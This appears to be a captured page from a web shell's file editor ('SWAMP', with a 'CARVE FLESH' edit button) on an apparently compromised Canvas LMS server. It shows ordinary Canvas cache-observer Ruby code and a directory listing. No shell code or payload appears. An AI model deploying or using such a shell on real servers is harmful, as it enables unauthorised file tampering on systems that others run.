░▒▓████████████████████████████████▓▒░ ░▒▓█ ▓▒░ ░▒▓█ ~ S W A M P ~ ▓▒░ ░▒▓█ ▓▒░ ░▒▓████████████████████████████████▓▒░
pplmvsvm
LOCATION:
/var/www/canvas/app/observers
☗ ROOT
↻ REFRESH
✎ CARVE FLESH
EDITING: cacher.rb
# frozen_string_literal: true # # Copyright (C) 2011 - present Instructure, Inc. # # This file is part of Canvas. # # Canvas is free software: you can redistribute it and/or modify it under # the terms of the GNU Affero General Public License as published by the Free # Software Foundation, version 3 of the License. # # Canvas is distributed in the hope that it will be useful, but WITHOUT ANY # WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR # A PARTICULAR PURPOSE. See the GNU Affero General Public License for more # details. # # You should have received a copy of the GNU Affero General Public License along # with this program. If not, see <http://www.gnu.org/licenses/>. class Cacher < ActiveRecord::Observer observe :user, :account_user def self.avatar_cache_key(user_id, account_avatar_setting) ["avatar_img", user_id, account_avatar_setting].cache_key end def self.inline_avatar_cache_key(user_id, account_avatar_setting) ["inline_avatar_img", user_id, account_avatar_setting].cache_key end def after_update(obj) case obj when User if obj.saved_change_to_avatar_image_url? || obj.saved_change_to_avatar_image_source? || obj.saved_change_to_avatar_state? User::AVATAR_SETTINGS.each do |avatar_setting| Rails.cache.delete(Cacher.avatar_cache_key(obj.global_id, avatar_setting)) Rails.cache.delete(Cacher.inline_avatar_cache_key(obj.global_id, avatar_setting)) end end end end def after_save(obj) case obj when AccountUser if obj.account_id == Account.site_admin.id Account.site_admin.shard.activate do AccountUser.connection.after_transaction_commit do # current shard may have reverted in this block Account.site_admin.shard.activate do Switchman::DatabaseServer.send_in_each_region(self.class, :clear_all_site_admin_account_users, { singleton: "clear_all_site_admin_account_users" }, AccountUser.current_xlog_location) end end end end end end def self.clear_all_site_admin_account_users(current_xlog_location = nil) # send_in_each_region lost the context of which shard was active Account.site_admin.shard.activate do AccountUser.wait_for_replication(start: current_xlog_location) MultiCache.delete("all_site_admin_account_users3") end end def after_destroy(obj) after_save(obj) end end
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📄 cacher.rb
RB
2.6 KB
2023-09-24 03:36
EDIT
📄 live_events_observer.rb
RB
2.5 KB
2023-09-24 03:36
EDIT
📄 stream_item_cache.rb
RB
2.5 KB
2023-09-24 03:36
EDIT